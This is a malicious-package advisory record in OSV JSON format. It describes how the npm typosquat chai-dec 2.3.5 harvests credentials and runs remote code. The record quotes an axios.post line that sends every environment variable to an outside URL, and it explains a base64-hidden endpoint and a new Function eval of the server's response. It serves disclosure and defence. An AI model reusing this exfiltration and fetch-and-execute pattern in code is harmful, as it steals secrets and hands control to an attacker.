{"id":"MAL-2026-5606","summary":"Malicious code in chai-dec (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (5fbe1098e3267cf9e98fe2591e27b58f87fb44ca8c5475a5fde64fed8c2dd1c3)\nchai-dec impersonates the chai/pino ecosystem (package name rides on chai; package.json keywords and exports — `module.exports.pino = middleware` — masquerade as the pino logger). When the exported middleware factory is invoked (the standard Express-style usage), index.js spawns a detached Node child running lib/initializeCaller.js. That script POSTs the entire process.env object to https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df via `axios.post(apiEndpoint, {...process.env }, { headers: { 'x-secret-header': 'secret' } })`, leaking every environment variable on the consumer's machine (AWS/GitHub/npm tokens, DB credentials, CI secrets, etc.). The destination URL is hidden behind a base64 blob in a locally-shadowed `process.env.DEV_API_KEY` and decoded with `atob` at runtime to evade static review. The HTTP response body is then passed to `new Function('require', response.data)` and invoked with the real `require`, giving the operator of the endpoint arbitrary remote code execution in the consumer process with full Node privileges. \nThis is a typosquat lure carrying a credential-harvest + dynamic-RCE payload.\n","modified":"2026-06-11T08:01:31.203508965Z","published":"2026-06-11T07:18:08Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-005693","modified_time":"2026-06-11T07:18:08Z","versions":["2.3.5"],"sha256":"5fbe1098e3267cf9e98fe2591e27b58f87fb44ca8c5475a5fde64fed8c2dd1c3","source":"amazon-inspector","import_time":"2026-06-11T07:49:41.792565932Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/chai-dec/v/2.3.5"}],"affected":[{"package":{"name":"chai-dec","ecosystem":"npm","purl":"pkg:npm/chai-dec"},"versions":["2.3.5"],"database_specific":{"indicators":{"package_integrity":[{"hashes":{"sha1":"787de62f68c405baa2f9ab203d2e59431f51614c","sha512_sri":"sha512-s5+MofCrzKo3WDjEDqlUyH/KcipEvzT0r3Fu84aHjvtl/qBzTi65LifIvN4efA/9TifLfNUr7MK6YPWcn8GT3Q=="},"filename":"chai-dec-2.3.5.tgz"}],"evidence_files":[{"tlsh":"f921f38e15fe101d066751e6bb2f24027022e8133946d4a47bcc835b1fc966e99936df","path":"lib/initializeCaller.js","sha256":"fc61b0ed62e346bfbb5e1e093e475d8b3065247dc8d315f0ea4e7cafd9661bad"},{"tlsh":"91019760ce789e2300ed25824c2a0643b6618c13a928fc2d32db512d0f9d8bf01bf22e","path":"package.json","sha256":"cb36fcdc10b8fb077ba9ebf442a53b851683ee6c86f953da370938098eced313"}]},"cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chai-dec/MAL-2026-5606.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}